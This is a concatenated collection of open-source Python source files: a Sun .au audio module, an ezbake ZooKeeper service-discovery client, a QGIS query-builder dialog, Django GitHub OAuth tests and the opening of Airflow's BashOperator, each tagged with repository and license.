if self._hdr_size > 24:
self._info = file.read(self._hdr_size - 24)
for i in range(len(self._info)):
if self._info[i] == '\0':
self._info = self._info[:i]
break
else:
self._info = ''
def getfp(self):
return self._file
def getnchannels(self):
return self._nchannels
def getsampwidth(self):
return self._sampwidth
def getframerate(self):
return self._framerate
def getnframes(self):
if self._data_size == AUDIO_UNKNOWN_SIZE:
return AUDIO_UNKNOWN_SIZE
if self._encoding in _simple_encodings:
return self._data_size / self._framesize
return 0 # XXX--must do some arithmetic here
def getcomptype(self):
if self._encoding == AUDIO_FILE_ENCODING_MULAW_8:
return 'ULAW'
elif self._encoding == AUDIO_FILE_ENCODING_ALAW_8:
return 'ALAW'
else:
return 'NONE'
def getcompname(self):
if self._encoding == AUDIO_FILE_ENCODING_MULAW_8:
return 'CCITT G.711 u-law'
elif self._encoding == AUDIO_FILE_ENCODING_ALAW_8:
return 'CCITT G.711 A-law'
else:
return 'not compressed'
def getparams(self):
return self.getnchannels(), self.getsampwidth(), \
self.getframerate(), self.getnframes(), \
self.getcomptype(), self.getcompname()
def getmarkers(self):
return None
def getmark(self, id):
raise Error, 'no marks'
def readframes(self, nframes):
if self._encoding in _simple_encodings:
if nframes == AUDIO_UNKNOWN_SIZE:
data = self._file.read()
else:
                # _framesize already accounts for the channel count (see
                # initfp), so don't multiply by _nchannels again here.
                data = self._file.read(nframes * self._framesize)
if self._encoding == AUDIO_FILE_ENCODING_MULAW_8:
import audioop
data = audioop.ulaw2lin(data, self._sampwidth)
return data
return None # XXX--not implemented yet
def rewind(self):
self._soundpos = 0
self._file.seek(self._hdr_size)
def tell(self):
return self._soundpos
def setpos(self, pos):
if pos < 0 or pos > self.getnframes():
raise Error, 'position not in range'
self._file.seek(pos * self._framesize + self._hdr_size)
self._soundpos = pos
def close(self):
self._file = None
class Au_write:
def __init__(self, f):
if type(f) == type(''):
import __builtin__
f = __builtin__.open(f, 'wb')
self.initfp(f)
def __del__(self):
if self._file:
self.close()
def initfp(self, file):
self._file = file
self._framerate = 0
self._nchannels = 0
self._sampwidth = 0
self._framesize = 0
self._nframes = AUDIO_UNKNOWN_SIZE
self._nframeswritten = 0
self._datawritten = 0
self._datalength = 0
self._info = ''
self._comptype = 'ULAW' # default is U-law
def setnchannels(self, nchannels):
if self._nframeswritten:
raise Error, 'cannot change parameters after starting to write'
if nchannels not in (1, 2, 4):
raise Error, 'only 1, 2, or 4 channels supported'
self._nchannels = nchannels
def getnchannels(self):
if not self._nchannels:
raise Error, 'number of channels not set'
return self._nchannels
def setsampwidth(self, sampwidth):
if self._nframeswritten:
raise Error, 'cannot change parameters after starting to write'
if sampwidth not in (1, 2, 4):
raise Error, 'bad sample width'
self._sampwidth = sampwidth
def getsampwidth(self):
        if not self._sampwidth:
            raise Error, 'sample width not specified'
return self._sampwidth
def setframerate(self, framerate):
if self._nframeswritten:
raise Error, 'cannot change parameters after starting to write'
self._framerate = framerate
def getframerate(self):
if not self._framerate:
raise Error, 'frame rate not set'
return self._framerate
def setnframes(self, nframes):
if self._nframeswritten:
raise Error, 'cannot change parameters after starting to write'
if nframes < 0:
raise Error, '# of frames cannot be negative'
self._nframes = nframes
def getnframes(self):
return self._nframeswritten
def setcomptype(self, type, name):
if type in ('NONE', 'ULAW'):
self._comptype = type
else:
raise Error, 'unknown compression type'
def getcomptype(self):
return self._comptype
def getcompname(self):
if self._comptype == 'ULAW':
return 'CCITT G.711 u-law'
elif self._comptype == 'ALAW':
return 'CCITT G.711 A-law'
else:
return 'not compressed'
def setparams(self, (nchannels, sampwidth, framerate, nframes, comptype, compname)):
self.setnchannels(nchannels)
self.setsampwidth(sampwidth)
self.setframerate(framerate)
self.setnframes(nframes)
self.setcomptype(comptype, compname)
def getparams(self):
return self.getnchannels(), self.getsampwidth(), \
self.getframerate(), self.getnframes(), \
self.getcomptype(), self.getcompname()
def tell(self):
return self._nframeswritten
def writeframesraw(self, data):
self._ensure_header_written()
nframes = len(data) / self._framesize
if self._comptype == 'ULAW':
import audioop
data = audioop.lin2ulaw(data, self._sampwidth)
self._file.write(data)
self._nframeswritten = self._nframeswritten + nframes
self._datawritten = self._datawritten + len(data)
def writeframes(self, data):
self.writeframesraw(data)
if self._nframeswritten != self._nframes or \
self._datalength != self._datawritten:
self._patchheader()
def close(self):
self._ensure_header_written()
if self._nframeswritten != self._nframes or \
self._datalength != self._datawritten:
self._patchheader()
self._file.flush()
self._file = None
#
# private methods
#
def _ensure_header_written(self):
if not self._nframeswritten:
if not self._nchannels:
raise Error, '# of channels not specified'
if not self._sampwidth:
raise Error, 'sample width not specified'
if not self._framerate:
raise Error, 'frame rate not specified'
self._write_header()
def _write_header(self):
if self._comptype == 'NONE':
if self._sampwidth == 1:
encoding = AUDIO_FILE_ENCODING_LINEAR_8
self._framesize = 1
elif self._sampwidth == 2:
encoding = AUDIO_FILE_ENCODING_LINEAR_16
self._framesize = 2
elif self._sampwidth == 4:
encoding = AUDIO_FILE_ENCODING_LINEAR_32
self._framesize = 4
else:
raise Error, 'internal error'
elif self._comptype == 'ULAW':
encoding = AUDIO_FILE_ENCODING_MULAW_8
self._framesize = 1
else:
raise Error, 'internal error'
self._framesize = self._framesize * self._nchannels
_write_u32(self._file, AUDIO_FILE_MAGIC)
header_size = 25 + len(self._info)
header_size = (header_size + 7) & ~7
_write_u32(self._file, header_size)
if self._nframes == AUDIO_UNKNOWN_SIZE:
length = AUDIO_UNKNOWN_SIZE
else:
length = self._nframes * self._framesize
_write_u32(self._file, length)
self._datalength = length
_write_u32(self._file, encoding)
_write_u32(self._file, self._framerate)
_write_u32(self._file, self._nchannels)
self._file.write(self._info)
self._file.write('\0'*(header_size - len(self._info) - 24))
def _patchheader(self):
self._file.seek(8)
_write_u32(self._file, self._datawritten)
self._datalength = self._datawritten
self._file.seek(0, 2)
def open(f, mode=None):
if mode is None:
if hasattr(f, 'mode'):
mode = f.mode
else:
mode = 'rb'
if mode in ('r', 'rb'):
return Au_read(f)
elif mode in ('w', 'wb'):
return Au_write(f)
else:
raise Error, "mode must be 'r', 'rb', 'w', or 'wb'"
openfp = open
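# Illustrative round trip (not part of the original module; the default
# compression is U-law, so each written 16-bit sample becomes one byte):
#
#   w = open('test.au', 'w')
#   w.setnchannels(1)
#   w.setsampwidth(2)
#   w.setframerate(8000)
#   w.writeframes('\0\0' * 8000)    # one second of silence
#   w.close()
#   r = open('test.au', 'r')
#   r.getparams()   # -> (1, 2, 8000, 8000, 'ULAW', 'CCITT G.711 u-law')
#   r.close()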
| gpl-2.0 |
ezbake/ezbake-common-python | discovery/lib/ezbake/discovery.py | 2 | 13534 | #!/usr/bin/env python
# Copyright (C) 2013-2014 Computer Sciences Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Register and locate services within ezDiscovery. """
import optparse
import sys
import time
from threading import RLock
from kazoo.client import KazooClient, NoNodeError
current_time_sec = lambda: int(round(time.time()))
class EphimeralDict(dict):
_instance = None
_rlock = RLock()
def __new__(cls, *args, **kwargs):
"""
Create the cache as a singleton.
:param cls:
:param args:
:param kwargs:
:return:
"""
with cls._rlock:
if getattr(cls, '_instance', None) is None:
cls._instance = super(EphimeralDict, cls).\
__new__(cls, *args, **kwargs)
return cls._instance
def __init__(self, ttl_secs=1200, *args, **kwargs):
"""
        Initializes the EphimeralDict.
        :param ttl_secs: number of seconds an entry stays retrievable after
            it is set
:return:
"""
super(EphimeralDict, self).__init__(*args, **kwargs)
self.ttl_secs = ttl_secs if not hasattr(self, 'ttl_secs') else self.ttl_secs
self._expires = getattr(self, '_expires', {})
self.rlock = self.__class__._rlock
def __setitem__(self, key, value):
"""
Set the value for the given key in the cache. Sets the key with the
ttl.
:param key:
:param value:
:return:
"""
with self.rlock:
self._expires[key] = current_time_sec() + self.ttl_secs
super(EphimeralDict, self).__setitem__(key, value)
def __getitem__(self, key):
"""
Get the value for the key in the cache.
:param key:
:return:
"""
self.prune(key)
return super(EphimeralDict, self).__getitem__(key)
def __contains__(self, k):
"""
Checks if item is in queue.
:param k:
:return:
"""
try:
self.prune(k)
except KeyError:
pass
return super(EphimeralDict, self).__contains__(k)
def __delitem__(self, key):
"""
Deletes the key from the dictionary.
:param key:
:return:
"""
with self.rlock:
del self._expires[key]
super(EphimeralDict, self).__delitem__(key)
def prune(self, key):
"""
        Prunes the inner data dictionary to ensure the ephemeral nature of the
class. It raises a KeyError if the given key is not in the data
dictionary.
:param key:
:return:
"""
# determine if the key has expired
with self.rlock:
expires_ts = self._expires[key]
if expires_ts < current_time_sec():
del self[key]
def clear(self):
"""
Clears the dictionary
:return:
"""
with self.rlock:
for k in self.keys():
del self[k]
def clean(self):
"""
Cleans the contents of the dictionary, and starts from scratch.
"""
del self.__class__._instance
EphimeralDict()
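# Illustrative usage (not part of the original module). Note that the class
# is a singleton, so ttl_secs is only honoured by the first instantiation:
#
#   cache = EphimeralDict(ttl_secs=2)
#   cache['key'] = 'value'
#   'key' in cache          # -> True, within the TTL window
#   time.sleep(3)
#   'key' in cache          # -> False, the entry has been pruned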
class ServiceDiscoveryClient:
NAMESPACE = 'ezDiscovery'
COMMON_APP_NAME = 'common_services'
ENDPOINTS = 'endpoints'
SECURITY = 'security'
SECURITY_ID = 'security_id'
def __init__(self, hosts='localhost:2181'):
self.hosts = hosts
self.securityIdCache = EphimeralDict(1000)
def _connect(self):
"""Create a connection to Zookeeper for use in discovery calls."""
zk = KazooClient(hosts=self.hosts)
zk.start()
return zk
@staticmethod
def _disconnect(zk):
"""Disconnect from Zookeeper if there is a connection."""
if zk:
zk.stop()
zk.close()
def register_endpoint(self, app_name, service_name, host, port):
"""Register an endpoint with Zookeeper."""
zk = self._connect()
try:
zk.ensure_path('/'.join([
self.NAMESPACE,
app_name,
service_name,
self.ENDPOINTS,
host + ':' + str(port)
]))
finally:
self._disconnect(zk)
def register_common_endpoint(self, service_name, host, port):
"""Register a common endpoint under the default application name."""
self.register_endpoint(self.COMMON_APP_NAME, service_name, host, port)
def _recurse_deletion(self, zk, path_parts):
"""Moves up the tree of the given path parts deleting if empty.
NOTE: Will not delete path from root to endpoints (inclusively).
"""
if len(path_parts) > 4:
path = '/'.join(path_parts)
if zk.exists(path) and not len(zk.get_children(path)):
zk.delete(path)
self._recurse_deletion(zk, path_parts[:-1])
def unregister_endpoint(self, app_name, service_name, host, port):
"""Unregister and endpoint with Zookeeper."""
zk = self._connect()
try:
self._recurse_deletion(zk, [
self.NAMESPACE,
app_name,
service_name,
self.ENDPOINTS,
host + ':' + str(port)
])
finally:
self._disconnect(zk)
def unregister_common_endpoint(self, service_name, host='localhost',
port=2181):
"""Unregister a common endpoint under the default application name."""
self.unregister_endpoint(self.COMMON_APP_NAME, service_name, host,
port)
def _get_children(self, path):
"""Shortcut method to return the children on the given path."""
zk = self._connect()
children = []
try:
if zk.exists(path):
children = zk.get_children(path)
finally:
self._disconnect(zk)
return children
def get_applications(self):
"""Get a list of applications registered in Zookeeper."""
return self._get_children(self.NAMESPACE)
def get_services(self, app_name):
"""Get a list services by the given application name."""
return self._get_children('/'.join([self.NAMESPACE, app_name]))
def get_common_services(self):
"""Get a list services under the common application name."""
return self.get_services(self.COMMON_APP_NAME)
def get_endpoints(self, app_name, service_name):
"""Get a list of endpoints by the given application and service name."""
return self._get_children(
'/'.join([self.NAMESPACE, app_name, service_name, self.ENDPOINTS])
)
def get_common_endpoints(self, service_name):
"""Get a list of endpoints from the common application name and given
service name.
"""
return self.get_endpoints(self.COMMON_APP_NAME, service_name)
def is_service_common(self, service_name):
"""Checks if the given service name is in the common services application.
NOTE: Returns false if the service does not exist.
"""
zk = self._connect()
try:
result = bool(zk.exists('/'.join([
self.NAMESPACE,
self.COMMON_APP_NAME,
service_name
])))
finally:
self._disconnect(zk)
return result
def set_security_id_for_application(self, app_name, security_id):
"""Set the security id for the given application."""
zk = self._connect()
try:
path = '/'.join([
self.NAMESPACE,
app_name,
self.SECURITY,
self.SECURITY_ID
])
zk.ensure_path(path)
zk.set(path, security_id)
finally:
self._disconnect(zk)
def get_security_id(self, target):
"""
        Given an app or common service name as target, this method determines
        whether the name is a common service or an application, and gets the
        appropriate security id for it.
        :param target: app name or common service name
:return: security_id
"""
if self.is_service_common(target):
target = '/'.join([self.COMMON_APP_NAME, target])
# return security id from cache if it exists
if target in self.securityIdCache:
return self.securityIdCache[target]
zk = self._connect()
result = None
try:
result = zk.get('/'.join([
self.NAMESPACE,
target,
self.SECURITY,
self.SECURITY_ID
]))[0]
self.securityIdCache[target] = result
except NoNodeError:
pass
finally:
self._disconnect(zk)
return result
def set_security_id_for_common_service(self, service_name, security_id):
"""Set the security id for the given common service."""
self.set_security_id_for_application(
'/'.join([self.COMMON_APP_NAME, service_name]),
security_id
)
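    # Illustrative usage (not part of the original class; assumes a reachable
    # ZooKeeper at the given address):
    #
    #   client = ServiceDiscoveryClient('zk-host:2181')
    #   client.register_endpoint('myapp', 'mysvc', '10.0.0.5', 8080)
    #   client.get_endpoints('myapp', 'mysvc')   # -> ['10.0.0.5:8080']
    #   client.unregister_endpoint('myapp', 'mysvc', '10.0.0.5', 8080)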
ACTIONS = {
'register': {
'args': [5, 'Must provide app name, service name, host and port.'],
'method': register_endpoint
},
'register-common-services': {
'args': [4, 'Must provide service name, host and port.'],
'method': register_common_endpoint
},
'unregister': {
'args': [5, 'Must provide app name, service name, host and port.'],
'method': unregister_endpoint
},
'unregister-common-services': {
'args': [4, 'Must provide service name, host and port.'],
'method': unregister_common_endpoint
},
'list-applications': {
'method': get_applications
},
'list-services': {
'args': [2, 'Must provide an app name.'],
'method': get_services
},
'list-common-services': {
'method': get_common_services
},
'list-endpoints': {
'args': [3, 'Must provide app name, service name.'],
'method': get_endpoints
},
'list-common-endpoints': {
'args': [2, 'Must provide a common service name.'],
'method': get_common_endpoints
},
'is-service-common': {
'args': [2, 'Must provide a service name.'],
'method': is_service_common
},
'application-set-security-id': {
'args': [3, 'Must provide an app name and security id.'],
        'method': set_security_id_for_application
},
'application-get-security-id': {
'args': [2, 'Must provide an app name.'],
'method': get_security_id
},
'common-service-set-security-id': {
'args': [3, 'Must provide a service name and security id.'],
'method': set_security_id_for_common_service
},
'common-service-get-security-id': {
'args': [2, 'Must provide a service name.'],
'method': get_security_id
},
}
def exec_cmd_line(self, args):
"""
execute command line
"""
action = args[0]
if action in self.ACTIONS:
action = self.ACTIONS[action]
if 'args' in action:
_arg_count(args, action['args'][0], action['args'][1])
method_args = [self] + args[1:]
result = action['method'](*method_args)
if result is not None: # Some commands return a boolean.
if isinstance(result, list):
for i in result:
print i
else:
print result
else:
print 'Invalid action: ' + action
sys.exit(1)
def _arg_count(args, number, message='Invalid arguments.'):
"""Counts the arguments given and exits with failed status if needed.
Really just a convenience method for the main method, not part of the
discovery API.
"""
if len(args) < number:
print message
sys.exit(1)
def invalid_action(action=''):
"""Prints an error message and exits."""
if action:
        print 'Invalid action: %s' % action
else:
print 'Action not specified.'
sys.exit(1)
def main():
"""Module will act as a command line utility if not imported as a module in
another application.
"""
parser = optparse.OptionParser(
usage='usage: %prog [options] ACTION arg1 arg2 ...'
)
parser.add_option(
'-z',
'--zookeeper',
default='localhost:2181',
help='Zookeeper location (host:port).'
)
options, args = parser.parse_args()
if not args:
invalid_action()
ServiceDiscoveryClient(options.zookeeper).exec_cmd_line(args)
if __name__ == '__main__':
main()
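# Illustrative command line usage (not part of the original module):
#
#   python discovery.py -z zk-host:2181 register myapp mysvc 10.0.0.5 8080
#   python discovery.py -z zk-host:2181 list-endpoints myapp mysvc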
| apache-2.0 |
NINAnor/QGIS | python/plugins/db_manager/dlg_query_builder.py | 3 | 15563 | # -*- coding: utf-8 -*-
"""
/***************************************************************************
Name : DB Manager
Description : Database manager plugin for QGIS
Date : March 2015
copyright : (C) 2015 Hugo Mercier / Oslandia
email : hugo dot mercier at oslandia dot com
***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
Query builder dialog, based on the QSpatialite plugin (GPLv2+) by Romain Riviere
"""
from PyQt4.QtGui import *
from PyQt4.QtCore import *
from .ui.ui_DlgQueryBuilder import Ui_DbManagerQueryBuilderDlg as Ui_Dialog
from .db_plugins.plugin import VectorTable
class FocusEventFilter(QObject):
def __init__(self, parent):
QObject.__init__(self, parent)
self.focus = ''
def eventFilter(self, obj, event):
if event.type() == QEvent.FocusIn:
self.focus = obj.objectName()
return QObject.eventFilter(self, obj, event)
def insertWithSelection(widget, text):
    if widget.textCursor().hasSelection(): # user has selected something...
selection = widget.textCursor().selectedText()
widget.insertPlainText(text + selection + ")")
else:
widget.insertPlainText(text)
def insertWithSelectionOn(parent, objectname, text):
"""Insert the text in a QTextEdit given by its objectname"""
w = parent.findChild(QTextEdit, objectname)
insertWithSelection(w, text)
class QueryBuilderDlg(QDialog):
# object used to store parameters between invocations
saveParameter = None
def __init__(self, iface, db, parent=None, reset=False):
QDialog.__init__(self, parent)
self.iface = iface
self.db = db
self.query = ''
self.ui = Ui_Dialog()
self.ui.setupUi(self)
self.ui.group.setMaximumHeight(self.ui.tab.sizeHint().height())
self.ui.order.setMaximumHeight(self.ui.tab.sizeHint().height())
self.evt = FocusEventFilter(self)
self.ui.col.installEventFilter(self.evt)
self.ui.where.installEventFilter(self.evt)
self.ui.group.installEventFilter(self.evt)
self.ui.order.installEventFilter(self.evt)
d = self.db.connector.getQueryBuilderDictionary()
#Application default parameters
self.table = None
self.col_col = []
self.col_where = []
self.coltables = []
self.ui.extract.setChecked(True)
#ComboBox default values
self.ui.functions.insertItems(1, d['function'])
self.ui.math.insertItems(1, d['math'])
self.ui.aggregates.insertItems(1, d['aggregate'])
self.ui.operators.insertItems(1, d['operator'])
self.ui.stringfct.insertItems(1, d['string'])
#self.ui.Rtree.insertItems(1,rtreecommand)
# restore last query if needed
if reset:
QueryBuilderDlg.saveParameter = None
if QueryBuilderDlg.saveParameter is not None:
self.restoreLastQuery()
#Show Tables
self.show_tables()
#Signal/slot
QObject.connect(self.ui.aggregates, SIGNAL("currentIndexChanged(const QString&)"), self.add_aggregate)
QObject.connect(self.ui.stringfct, SIGNAL("currentIndexChanged(const QString&)"), self.add_stringfct)
QObject.connect(self.ui.operators, SIGNAL("currentIndexChanged(const QString&)"), self.add_operators)
QObject.connect(self.ui.functions, SIGNAL("currentIndexChanged(const QString&)"), self.add_functions)
QObject.connect(self.ui.math, SIGNAL("currentIndexChanged(const QString&)"), self.add_math)
QObject.connect(self.ui.tables, SIGNAL("currentIndexChanged(const QString&)"), self.add_tables)
QObject.connect(self.ui.tables, SIGNAL("currentIndexChanged(const QString&)"), self.list_cols)
QObject.connect(self.ui.columns, SIGNAL("currentIndexChanged(const QString&)"), self.add_columns)
QObject.connect(self.ui.columns_2, SIGNAL("currentIndexChanged(const QString&)"), self.list_values)
QObject.connect(self.ui.reset, SIGNAL("clicked(bool)"), self.reset)
QObject.connect(self.ui.extract, SIGNAL("stateChanged(int)"), self.list_values)
QObject.connect(self.ui.values, SIGNAL("doubleClicked(const QModelIndex &)"), self.query_item)
QObject.connect(self.ui.buttonBox, SIGNAL("accepted()"), self.validate)
QObject.connect(self.ui.checkBox, SIGNAL("stateChanged(int)"), self.show_tables)
if self.db.explicitSpatialIndex():
self.tablesGeo = [table for table in self.tables if isinstance(table, VectorTable)]
tablesGeo = ['"%s"."%s"' % (table.name, table.geomColumn) for table in self.tablesGeo]
self.ui.table_target.insertItems(1, tablesGeo)
self.idxTables = [table for table in self.tablesGeo if table.hasSpatialIndex()]
idxTables = ['"%s"."%s"' % (table.name, table.geomColumn) for table in self.idxTables]
self.ui.table_idx.insertItems(1, idxTables)
QObject.connect(self.ui.usertree, SIGNAL("clicked(bool)"), self.use_rtree)
else:
self.ui.toolBox.setItemEnabled(2, False)
def update_table_list(self):
self.tables = []
add_sys_tables = self.ui.checkBox.isChecked()
schemas = self.db.schemas()
if schemas is None:
self.tables = self.db.tables(None, add_sys_tables)
else:
for schema in schemas:
self.tables += self.db.tables(schema, add_sys_tables)
def show_tables(self):
self.update_table_list()
self.ui.tables.clear()
self.ui.tables.insertItems(0, ["Tables"])
self.ui.tables.insertItems(1, [t.name for t in self.tables])
def add_aggregate(self):
if self.ui.aggregates.currentIndex() <= 0:
return
ag = self.ui.aggregates.currentText()
insertWithSelection(self.ui.col, ag)
self.ui.aggregates.setCurrentIndex(0)
def add_functions(self):
if self.ui.functions.currentIndex() <= 0:
return
ag = self.ui.functions.currentText()
insertWithSelectionOn(self, self.evt.focus, ag)
self.ui.functions.setCurrentIndex(0)
def add_stringfct(self):
        if self.ui.stringfct.currentIndex() <= 0:
return
ag = self.ui.stringfct.currentText()
insertWithSelectionOn(self, self.evt.focus, ag)
self.ui.stringfct.setCurrentIndex(0)
def add_math(self):
if self.ui.math.currentIndex() <= 0:
return
ag = self.ui.math.currentText()
insertWithSelectionOn(self, self.evt.focus, ag)
self.ui.math.setCurrentIndex(0)
def add_operators(self):
if self.ui.operators.currentIndex() <= 0:
return
ag = self.ui.operators.currentText()
if self.evt.focus == "where": # in where section
self.ui.where.insertPlainText(ag)
else:
self.ui.col.insertPlainText(ag)
self.ui.operators.setCurrentIndex(0)
def add_tables(self):
if self.ui.tables.currentIndex() <= 0:
return
ag = self.ui.tables.currentText()
#Retrieve Table Object from txt
tableObj = [table for table in self.tables if table.name.upper() == ag.upper()]
if len(tableObj) != 1:
return # No object with this name
self.table = tableObj[0]
if (ag in self.coltables): # table already use
response = QMessageBox.question(self, "Table already used", "Do you want to add table %s again?" % ag, QMessageBox.Yes | QMessageBox.No)
if response == QMessageBox.No:
return
ag = self.table.quotedName()
txt = self.ui.tab.text()
if (txt is None) or (txt in ("", " ")):
self.ui.tab.setText('%s' % ag)
else:
self.ui.tab.setText('%s, %s' % (txt, ag))
self.ui.tables.setCurrentIndex(0)
def add_columns(self):
if self.ui.columns.currentIndex() <= 0:
return
ag = self.ui.columns.currentText()
if self.evt.focus == "where": # in where section
if ag in self.col_where: # column already called in where section
response = QMessageBox.question(self, "Column already used in WHERE clause", "Do you want to add column %s again?" % ag, QMessageBox.Yes | QMessageBox.No)
if response == QMessageBox.No:
self.ui.columns.setCurrentIndex(0)
return
self.ui.where.insertPlainText(ag)
self.col_where.append(ag)
elif self.evt.focus == "col":
if ag in self.col_col: # column already called in col section
response = QMessageBox.question(self, "Column already used in COLUMNS section", "Do you want to add column %s again?" % ag, QMessageBox.Yes | QMessageBox.No)
if response == QMessageBox.No:
self.ui.columns.setCurrentIndex(0)
return
if len(self.ui.col.toPlainText().strip()) > 0:
self.ui.col.insertPlainText(",\n" + ag)
else:
self.ui.col.insertPlainText(ag)
self.col_col.append(ag)
elif self.evt.focus == "group":
if len(self.ui.group.toPlainText().strip()) > 0:
self.ui.group.insertPlainText(", " + ag)
else:
self.ui.group.insertPlainText(ag)
elif self.evt.focus == "order":
if len(self.ui.order.toPlainText().strip()) > 0:
self.ui.order.insertPlainText(", " + ag)
else:
self.ui.order.insertPlainText(ag)
self.ui.columns.setCurrentIndex(0)
def list_cols(self):
table = self.table
if (table is None):
return
if (table.name in self.coltables):
return
columns = ['"%s"."%s"' % (table.name, col.name) for col in table.fields()]
#add special '*' column:
columns = ['"%s".*' % table.name] + columns
self.coltables.append(table.name) # table columns have been listed
# first and second col combobox
end = self.ui.columns.count()
self.ui.columns.insertItems(end, columns)
self.ui.columns_2.insertItems(end, columns)
end = self.ui.columns.count()
self.ui.columns.insertSeparator(end)
self.ui.columns_2.insertSeparator(end)
def list_values(self):
if self.ui.columns_2.currentIndex() <= 0:
return
item = self.ui.columns_2.currentText()
#recover column and table:
column = item.split(".") # "table".'column'
table = column[0]
if column[1] == '*':
return
table = table[1:-1]
qtable = [t for t in self.tables if t.name.lower() == table.lower()][0].quotedName()
if self.ui.extract.isChecked():
limit = 10
else:
limit = None
model = self.db.columnUniqueValuesModel(item, qtable, limit)
self.ui.values.setModel(model)
def query_item(self, index):
queryWord = index.data()
queryWord = ' "%s"' % queryWord
if queryWord != '':
self.ui.where.insertPlainText(queryWord)
self.ui.where.setFocus()
def use_rtree(self):
idx = self.ui.table_idx.currentText()
if idx in (None, "", " ", "Table (with Spatial Index)"):
return
        try:
            tab_idx = idx.split(".")[0][1:-1] # remove "
            col_idx = idx.split(".")[1][1:-1] # remove "
        except IndexError:
            QMessageBox.warning(self, "DB Manager", "All fields are necessary")
            return
tgt = self.ui.table_target.currentText()
if tgt in (None, "", " ", "Table (Target)"):
return
tgt_tab = tgt.split('.')[0][1:-1]
tgt_col = tgt.split('.')[1][1:-1]
sql = ""
if self.ui.where.toPlainText() not in (None, "", " "):
sql += "\nAND"
sql += self.db.spatialIndexClause(tab_idx, col_idx, tgt_tab, tgt_col)
self.ui.where.insertPlainText(sql)
def reset(self):
#reset lists:
self.ui.values.setModel(None)
self.ui.columns_2.clear()
self.ui.columns.insertItems(0, ["Columns"])
self.ui.columns_2.insertItems(0, ["Columns"])
self.coltables = []
self.col_col = []
self.col_where = []
def validate(self):
query_col = unicode(self.ui.col.toPlainText())
query_table = unicode(self.ui.tab.text())
query_where = unicode(self.ui.where.toPlainText())
query_group = unicode(self.ui.group.toPlainText())
query_order = unicode(self.ui.order.toPlainText())
query = ""
if query_col.strip() != '':
query += "SELECT %s \nFROM %s" % (query_col, query_table)
if query_where.strip() != '':
query += "\nWHERE %s" % query_where
if query_group.strip() != '':
query += "\nGROUP BY %s" % query_group
if query_order.strip() != '':
query += "\nORDER BY %s" % query_order
if query == '':
return
self.query = query
saveParameter = {}
saveParameter["coltables"] = self.coltables
saveParameter["col_col"] = self.col_col
saveParameter["col_where"] = self.col_where
saveParameter["col"] = query_col
saveParameter["tab"] = query_table
saveParameter["where"] = query_where
saveParameter["group"] = query_group
saveParameter["order"] = query_order
QueryBuilderDlg.saveParameter = saveParameter
def restoreLastQuery(self):
self.update_table_list()
saveParameter = QueryBuilderDlg.saveParameter
self.coltables = saveParameter["coltables"]
self.col_col = saveParameter["col_col"]
self.col_where = saveParameter["col_where"]
self.ui.col.insertPlainText(saveParameter["col"])
self.ui.tab.setText(saveParameter["tab"])
self.ui.where.insertPlainText(saveParameter["where"])
self.ui.order.setPlainText(saveParameter["order"])
self.ui.group.setPlainText(saveParameter["group"])
#list previous colist:
for tablename in self.coltables:
#Retrieve table object from table name:
table = [table for table in self.tables if table.name.upper() == tablename.upper()]
if len(table) != 1:
break
table = table[0]
columns = ['"%s"."%s"' % (table.name, col.name) for col in table.fields()]
# first and second col combobox
end = self.ui.columns.count()
self.ui.columns.insertItems(end, columns)
self.ui.columns_2.insertItems(end, columns)
end = self.ui.columns.count()
self.ui.columns.insertSeparator(end)
self.ui.columns_2.insertSeparator(end)
| gpl-2.0 |
Soovox/django-socialregistration | socialregistration/contrib/github/tests.py | 10 | 1369 | from django.conf import settings
from django.core.urlresolvers import reverse
from django.test import TestCase
from socialregistration.contrib.github.models import GithubProfile
from socialregistration.tests import TemplateTagTest, OAuth2Test
import json
import urllib
class TestTemplateTag(TemplateTagTest, TestCase):
def get_tag(self):
return 'github', 'github_button'
class TestGithub(OAuth2Test, TestCase):
profile = GithubProfile
def get_redirect_url(self):
return reverse('socialregistration:github:redirect')
def get_callback_url(self):
return reverse('socialregistration:github:callback')
def get_setup_callback_url(self):
return reverse('socialregistration:github:setup')
def get_callback_mock_response(self, *args, **kwargs):
return {'status': '200'}, urllib.urlencode({
'access_token': '456'})
def get_setup_callback_mock_response(self, *args, **kwargs):
return {'status': '200'}, json.dumps({'login': '123'})
def create_profile(self, user):
GithubProfile.objects.create(user=user, github='123')
class TestAuthenticationBackend(TestCase):
def test_authentication_backend_should_be_configured_in_settings(self):
self.assertTrue('socialregistration.contrib.github.auth.GithubAuth' in settings.AUTHENTICATION_BACKENDS)
| mit |
saguziel/incubator-airflow | airflow/operators/bash_operator.py | 29 | 3891 | # -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from builtins import bytes
import os
import signal
import logging
from subprocess import Popen, STDOUT, PIPE
from tempfile import gettempdir, NamedTemporaryFile
from airflow.exceptions import AirflowException
from airflow.models import BaseOperator
from airflow.utils.decorators import apply_defaults
from airflow.utils.file import TemporaryDirectory
class BashOperator(BaseOperator):
"""
Execute a Bash script, command or set of commands.
:param bash_command: The command, set of commands or reference to a
bash script (must be '.sh') to be executed.
:type bash_command: string
:param xcom_push: If xcom_push is True, the last line written to stdout
will also be pushed to an XCom when the bash command completes.
:type xcom_push: bool
:param env: If env is not None, it must be a mapping that defines the
environment variables for the new process; these are used instead
of inheriting the current process environment, which is the default
behavior. (templated)
:type env: dict
    :param output_encoding: output encoding of bash command
    :type output_encoding: string
"""
template_fields = ('bash_command', 'env')
template_ext = ('.sh', '.bash',)
ui_color = '#f0ede4'
@apply_defaults
def __init__(
self,
bash_command,
xcom_push=False,
env=None,
output_encoding='utf-8',
*args, **kwargs):
super(BashOperator, self).__init__(*args, **kwargs)
self.bash_command = bash_command
self.env = env
